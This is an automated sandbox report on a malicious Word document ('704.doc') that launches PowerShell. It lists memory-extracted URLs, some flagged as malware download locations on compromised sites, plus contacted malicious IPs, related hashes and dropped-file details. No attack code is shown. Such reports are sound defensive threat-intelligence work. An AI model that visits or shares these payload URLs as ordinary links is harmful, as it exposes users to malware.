                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                              high
                              https://cloudfiles.onenote.com/upload.aspxED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                  high
                                  https://entitlement.diagnosticssdf.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                    high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                      high
                                      http://huskysb.com4powershell.exe, 00000006.00000002.754451635.000000000531E000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://api.aadrm.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ckfoods.net/wp-admin/wPInm2rgMu/PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drtrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                        high
                                        https://api.microsoftstream.com/api/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                          high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                            high
                                            https://cr.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                              high
                                              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://portal.office.com/account/?ref=ClientMeControlED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.753910843.0000000005021000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://graph.ppe.windows.netED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                    high
                                                    https://res.getmicrosoftkey.com/api/redemptioneventsED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://powerlift-frontdesk.acompli.netED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://tasks.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                      high
                                                      https://officeci.azurewebsites.net/api/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/workED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                        high
                                                        https://store.office.cn/addinstemplateED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.aadrm.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://go.micropowershell.exe, 00000006.00000003.728233664.0000000005A8B000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                            high
                                                            https://globaldisco.crm.dynamics.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                              high
                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                high
                                                                https://dev0-api.acompli.net/autodetectED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.odwebp.svc.msED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drtrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://api.powerbi.com/v1.0/myorg/groupsED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                  high
                                                                  https://web.microsoftstream.com/video/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                    high
                                                                    https://api.addins.store.officeppe.com/addinstemplateED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://graph.windows.netED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                      high
                                                                      https://dataservice.o365filtering.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://officesetup.getmicrosoftkey.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://analysis.windows.net/powerbi/apiED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                          high
                                                                          https://prod-global-autodetect.acompli.net/autodetectED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://outlook.office365.com/autodiscover/autodiscover.jsonED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                            high
                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                              high
                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                  high
                                                                                  https://ncus.contentsync.ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                    high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                      high
                                                                                      http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drtrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://weather.service.msn.com/data.aspxED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                        high
                                                                                        https://apis.live.net/v5.0/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                          high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                            high
                                                                                            http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/.Split/ppowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                              high
                                                                                              https://management.azure.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                  high
                                                                                                  https://wus2.contentsync.ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://incidents.diagnostics.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/iosED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                      high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                          high
                                                                                                          http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/tppowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.netED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policiesED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v2/initED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                          high
                                                                                                                          http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/deXnG/.Split.Splitpowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://storage.live.com/clientlogs/uploadlocationED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                            high
                                                                                                                            http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/hpowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://outlook.office365.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                                    high
                                                                                                                                    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drtrue
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    60.248.112.145
                                                                                                                                    huskysb.comTaiwan; Republic of China (ROC)
                                                                                                                                    3462HINETDataCommunicationBusinessGroupTWtrue
                                                                                                                                    148.72.96.3
                                                                                                                                    primtalent.comUnited States
                                                                                                                                    26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                    Analysis ID:526268
                                                                                                                                    Start date:22.11.2021
                                                                                                                                    Start time:13:21:39
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 6m 9s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:704.doc
                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • GSI enabled (VBA)
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.expl.evad.winDOC@8/18@2/2
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 2
                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .doc
                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                    • Attach to Office via COM
                                                                                                                                    • Scroll down
                                                                                                                                    • Close Viewer
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.88.38, 52.109.8.23
                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6312 because it is empty
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/526268/sample/704.doc

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    13:23:00API Interceptor34x Sleep call for process: powershell.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    60.248.112.145http://pipspeakhypnotherapy.co.uk/administrator/zp472n-7r-63/Get hashmaliciousBrowse
                                                                                                                                    • dhartimata.com/tmp/diyl8uu13-9zf1bm-55570559/
                                                                                                                                    http://www.clinicasprevenga.com/administrator/ksS/Get hashmaliciousBrowse
                                                                                                                                    • dhartimata.com/tmp/diyl8uu13-9zf1bm-55570559/

                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    HINETDataCommunicationBusinessGroupTWeh.x86Get hashmaliciousBrowse
                                                                                                                                    • 1.161.6.165
                                                                                                                                    g2ZhDilVO3Get hashmaliciousBrowse
                                                                                                                                    • 218.165.166.26
                                                                                                                                    tvUK6374iRGet hashmaliciousBrowse
                                                                                                                                    • 1.164.5.236
                                                                                                                                    Hilix.arm7Get hashmaliciousBrowse
                                                                                                                                    • 59.115.241.230
                                                                                                                                    Hilix.armGet hashmaliciousBrowse
                                                                                                                                    • 220.143.72.164
                                                                                                                                    beamer.x86-20211121-1750Get hashmaliciousBrowse
                                                                                                                                    • 1.170.61.226
                                                                                                                                    eh.arm7Get hashmaliciousBrowse
                                                                                                                                    • 220.131.198.163
                                                                                                                                    3XVTeL2yOEGet hashmaliciousBrowse
                                                                                                                                    • 125.226.158.70
                                                                                                                                    IITDPxQInQGet hashmaliciousBrowse
                                                                                                                                    • 122.122.122.122
                                                                                                                                    1516i9qcBSGet hashmaliciousBrowse
                                                                                                                                    • 111.250.216.207
                                                                                                                                    sbngG3QrhWGet hashmaliciousBrowse
                                                                                                                                    • 59.125.55.249
                                                                                                                                    1xIIdZAcuGGet hashmaliciousBrowse
                                                                                                                                    • 122.122.122.122
                                                                                                                                    k2VHVQmprjGet hashmaliciousBrowse
                                                                                                                                    • 122.123.50.46
                                                                                                                                    zsrIbaaV98Get hashmaliciousBrowse
                                                                                                                                    • 220.131.226.59
                                                                                                                                    x86-20211121-1750Get hashmaliciousBrowse
                                                                                                                                    • 111.253.7.109
                                                                                                                                    arm-20211121-1750Get hashmaliciousBrowse
                                                                                                                                    • 114.37.145.243
                                                                                                                                    gs7vlNr1W7Get hashmaliciousBrowse
                                                                                                                                    • 114.24.94.40
                                                                                                                                    qr1kjCbqduGet hashmaliciousBrowse
                                                                                                                                    • 122.118.210.86
                                                                                                                                    Z4GtdTRjuRGet hashmaliciousBrowse
                                                                                                                                    • 122.116.239.149
                                                                                                                                    4IjC16LtGDGet hashmaliciousBrowse
                                                                                                                                    • 122.122.122.122
                                                                                                                                    AS-26496-GO-DADDY-COM-LLCUSnHSmNKw7PN.exeGet hashmaliciousBrowse
                                                                                                                                    • 184.168.119.143
                                                                                                                                    New Order 000112221.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.201.188.238
                                                                                                                                    1711.docGet hashmaliciousBrowse
                                                                                                                                    • 72.167.40.83
                                                                                                                                    new order.exeGet hashmaliciousBrowse
                                                                                                                                    • 107.180.56.180
                                                                                                                                    AD0eMpLdJo81Tjr.exeGet hashmaliciousBrowse
                                                                                                                                    • 184.168.96.165
                                                                                                                                    202111161629639000582.exeGet hashmaliciousBrowse
                                                                                                                                    • 45.40.150.136
                                                                                                                                    UNPDMVX63128.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.238.97.193
                                                                                                                                    QLTWPAU89862.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.238.97.193
                                                                                                                                    gs7vlNr1W7Get hashmaliciousBrowse
                                                                                                                                    • 173.201.204.147
                                                                                                                                    http___103.170.255.140_pdfword_invc_000930003999000.wbkGet hashmaliciousBrowse
                                                                                                                                    • 50.62.172.157
                                                                                                                                    enterprise_rental_agreement_lookup.jsGet hashmaliciousBrowse
                                                                                                                                    • 198.71.233.135
                                                                                                                                    11.2021..exeGet hashmaliciousBrowse
                                                                                                                                    • 166.62.10.136
                                                                                                                                    Conditions de paiement.exeGet hashmaliciousBrowse
                                                                                                                                    • 166.62.10.136
                                                                                                                                    PROJECT NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 148.72.214.23
                                                                                                                                    QUOTE REQUEST FOB_Medlited Trading Co.exeGet hashmaliciousBrowse
                                                                                                                                    • 72.167.84.16
                                                                                                                                    SecuriteInfo.com.Variant.Bulz.885187.6822.exeGet hashmaliciousBrowse
                                                                                                                                    • 107.180.56.180
                                                                                                                                    BANK DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 148.72.214.23
                                                                                                                                    Doc00000883746473.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 148.72.214.23
                                                                                                                                    2YnVgiNH23Get hashmaliciousBrowse
                                                                                                                                    • 107.180.2.16
                                                                                                                                    ncMG8wu5IGGet hashmaliciousBrowse
                                                                                                                                    • 107.180.12.15

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\646848703.dll
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):7616
                                                                                                                                    Entropy (8bit):5.643493512858842
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJqZ:QJvVGaRF8I8e
                                                                                                                                    MD5:25CB0101745D210670A8C622B713D25E
                                                                                                                                    SHA1:6FB348D14036D1E68C4AE68DEFB3A3B53B0E7283
                                                                                                                                    SHA-256:94C62A22BC584EFECEA77DF528342119056CA59D3D6F8CB39F02C9EDC160C14C
                                                                                                                                    SHA-512:9F4AD3E6FBDF229BF71B5F6F228C98663E689AAAF71FA0357875F16AD33AB76FCEAB938D6E281752259D4395F35614235141BDBF233836B308E0F8A476769CDC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):140193
                                                                                                                                    Entropy (8bit):5.357932616669791
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:bcQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:xuQ9DQW+zYXfH
                                                                                                                                    MD5:08DCA7A4FCD6393E7C011CA63B152E0C
                                                                                                                                    SHA1:3C94D8DA46A4F629BEB5AAC702B1E65746A2F020
                                                                                                                                    SHA-256:1DC17B81DE4BB45441D0C257D754359BC55F2B37D170385E63BFD05BAD5F5E6B
                                                                                                                                    SHA-512:7F8B475098391D6475E842155226E855396FBCFC3D38A49B6851E14E8DB67639596C55D56033D5E94C784ED3D72423F09A03FE476F24CAAF3AF19BA8716496E7
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-22T12:22:35">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\665C8B7A.png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):121507
                                                                                                                                    Entropy (8bit):7.978393301250379
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
                                                                                                                                    MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
                                                                                                                                    SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
                                                                                                                                    SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
                                                                                                                                    SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):4.808788708175036
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:IMV2gfCYtBMnkyXpua8HVRV2gfCYtBMnkyXpua8H:M6N7MkVhHY6N7MkVhH
                                                                                                                                    MD5:194AF1A94B7E75A87C5BE6F1F9453857
                                                                                                                                    SHA1:F8EC8975336DD690A8CF44D1D64C917F13305E2F
                                                                                                                                    SHA-256:596C8EBE3A92F62DFA347202C79910F848A418DE4B2371B213A0004086957D9C
